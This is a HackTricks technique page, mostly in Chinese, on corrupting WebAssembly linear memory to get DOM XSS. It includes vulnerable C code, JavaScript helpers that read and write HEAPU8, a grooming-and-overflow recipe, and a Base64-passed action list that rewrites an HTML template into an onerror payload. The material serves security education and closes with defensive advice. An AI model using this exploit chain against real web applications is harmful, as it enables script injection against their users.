WebAssembly linear memory corruption to DOM XSS (template overwrite)

Reading time: 11 minutes

tip

学习和实践 AWS 黑客技术：HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术：HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术：HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。

本技术展示了如何将编译自 Emscripten 的 WebAssembly (WASM) 模块内的 memory-corruption bug 武器化为可靠的 DOM XSS，即使输入已被清理。关键在于不是去攻击已被清理的源字符串，而是破坏 WASM linear memory 中可写的常量（例如 HTML format templates）。

关键思想：在 WebAssembly 模型中，代码位于不可写的可执行页面，但模块的数据（heap/stack/globals/"constants"）位于单一平面 linear memory（64KB 的页面），由模块可写。如果有 buggy C/C++ 代码越界写入，就能覆盖相邻对象，甚至覆盖嵌入在 linear memory 中的常量字符串。当这样的常量随后被用来构建并通过 DOM sink 插入 HTML 时，你可以将已被 sanitizer 编码的输入变成可执行的 JavaScript。

威胁模型和前提条件

Web app 使用 Emscripten glue (Module.cwrap) 来调用 WASM 模块。
应用状态保存在 WASM linear memory 中（例如 C structs，包含指向用户缓冲区的指针/长度）。
输入 sanitizer 在存储前对元字符进行编码，但后续渲染使用存储在 WASM linear memory 中的格式字符串来构建 HTML。
存在一个 linear-memory 损坏原语（例如 heap overflow、UAF，或 unchecked memcpy）。

最小易受攻击的数据模型（示例）

typedef struct msg {
char *msg_data;       // pointer to message bytes
size_t msg_data_len;  // length after sanitization
int msg_time;         // timestamp
int msg_status;       // flags
} msg;

typedef struct stuff {
msg *mess;            // dynamic array of msg
size_t size;          // used
size_t capacity;      // allocated
} stuff; // global chat state in linear memory

易受攻击的逻辑模式

addMsg(): 为已清理的输入分配一个新的 buffer 并将 msg 追加到 s.mess，在需要时使用 realloc 将容量翻倍。
editMsg(): 重新清理并用 memcpy 将新字节复制到现有 buffer 中，但没有确保新长度 ≤ 旧分配 → intra‑linear‑memory heap overflow。
populateMsgHTML(): 使用驻留在 linear memory 中的固定模板如 "
%.*s
" 格式化已清理的文本。返回的 HTML 会落入一个 DOM sink（例如 innerHTML）。

Allocator grooming with realloc()

int add_msg_to_stuff(stuff *s, msg new_msg) {
if (s->size >= s->capacity) {
s->capacity *= 2;
s->mess = (msg *)realloc(s->mess, s->capacity * sizeof(msg));
if (s->mess == NULL) exit(1);
}
s->mess[s->size++] = new_msg;
return s->size - 1;
}

发送足够多的消息以超出初始容量。增长后，realloc() 通常会将 s->mess 放置在线性内存中最后一个用户缓冲区的后面。
通过 editMsg() 溢出最后一条消息以破坏 s->mess 内的字段（例如，覆盖 msg_data 指针）→ 在线性内存中任意 pointer 重写，从而影响随后被渲染的数据。

Exploit pivot: overwrite the HTML template (sink) instead of the sanitized source

Sanitization protects input, not sinks. Find the format stub used by populateMsgHTML(), e.g.:
"
%.*s
" → change to ""
通过扫描线性内存可确定性地定位该 stub；它是在 Module.HEAPU8 中的一个纯字节字符串。
在你覆盖该 stub 之后，经过 sanitize 的消息内容就会成为 onerror 的 JavaScript 处理器，因此添加一条文本为 alert(1337) 的新消息会生成并立即在 DOM 中执行。

Chrome DevTools workflow (Emscripten glue)

在 JS glue 中的第一个 Module.cwrap 调用处设置断点并单步进入 wasm 调用位置以捕获 pointer 参数（线性内存中的数值偏移）。
在控制台中使用像 Module.HEAPU8 这样的 typed views 来读/写 WASM memory。
Helper snippets:

javascript

function writeBytes(ptr, byteArray){
if(!Array.isArray(byteArray)) throw new Error("byteArray must be an array of numbers");
for(let i=0;i<byteArray.length;i++){
const byte = byteArray[i];
if(typeof byte!=="number"||byte<0||byte>255) throw new Error(`Invalid byte at index ${i}: ${byte}`);
HEAPU8[ptr+i]=byte;
}
}
function readBytes(ptr,len){ return Array.from(HEAPU8.subarray(ptr,ptr+len)); }
function readBytesAsChars(ptr,len){
const bytes=HEAPU8.subarray(ptr,ptr+len);
return Array.from(bytes).map(b=>(b>=32&&b<=126)?String.fromCharCode(b):'.').join('');
}
function searchWasmMemory(str){
const mem=Module.HEAPU8, pat=new TextEncoder().encode(str);
for(let i=0;i<mem.length-pat.length;i++){
let ok=true; for(let j=0;j<pat.length;j++){ if(mem[i+j]!==pat[j]){ ok=false; break; } }
if(ok) console.log(`Found "${str}" at memory address:`, i);
}
console.log(`"${str}" not found in memory`);
return -1;
}
const a = bytes => bytes.reduce((acc, b, i) => acc + (b << (8*i)), 0); // little-endian bytes -> int

End-to-end exploitation recipe

Groom: 添加 N 个小消息以触发 realloc()。确保 s->mess 与 user buffer 相邻。
Overflow: 对最后一条消息调用 editMsg()，用更长的 payload 覆盖 s->mess 中的一个条目，将 message 0 的 msg_data 设置为指向 (stub_addr + 1)。+1 用来跳过开头的 '<'，以便在下次编辑时保持标签对齐。
Template rewrite: 编辑 message 0，使其字节覆盖模板为: "img src=1 onerror=%.*s ".
Trigger XSS: 添加一条新消息，其被清理后的内容为 JavaScript，例如 alert(1337)。渲染时会输出并执行。

Example action list to serialize and place in ?s= (Base64-encode with btoa before use)

json

[
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"add","content":"hi","time":1756840476392},
{"action":"edit","msgId":10,"content":"aaaaaaaaaaaaaaaa.\u0000\u0001\u0000\u0050","time":1756885686080},
{"action":"edit","msgId":0,"content":"img src=1      onerror=%.*s ","time":1756885686080},
{"action":"add","content":"alert(1337)","time":1756840476392}
]

为什么此绕过有效

WASM 防止从线性内存执行代码，但如果程序逻辑有漏洞，线性内存中的常量数据可能是可写的。
sanitizer 仅保护源字符串；通过破坏 sink（HTML 模板），被净化的输入会成为 JS 处理器的值，并在插入 DOM 时执行。
realloc()-driven 相邻布局加上编辑流程中未检查的 memcpy 允许指针被破坏，从而将写入重定向到线性内存中攻击者选择的地址。

泛化及其他攻击面

任何嵌入在线性内存中的内存内 HTML 模板、JSON 骨架或 URL 模式都可能成为目标，用以改变下游对被净化数据的解释方式。
其他常见的 WASM 陷阱：线性内存的越界写/读、堆对象的 UAF、带未检查间接调用索引的 function-table 滥用，以及 JS↔WASM 粘合层不匹配。

防御建议

在编辑路径中，验证 new length ≤ capacity；在复制前调整缓冲区大小（realloc 到 new_len），或使用有大小限制的 API（snprintf/strlcpy），并跟踪容量。
将不可变模板放在可写的线性内存之外，或在使用前对其进行完整性校验。
将 JS↔WASM 边界视为不受信任：验证指针范围/长度，对导出接口进行模糊测试，并限制内存增长。
在 sink 端进行消毒：避免在 WASM 中构建 HTML；优先使用安全的 DOM API，而不是 innerHTML-style templating。
不要在特权流程中信任嵌入在 URL 中的状态。

参考资料

tip

支持 HackTricks

查看 订阅计划!
加入 💬 Discord 群组 或 Telegram 群组 或在 Twitter 🐦 上关注我们 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud GitHub 仓库提交 PR 来分享黑客技巧。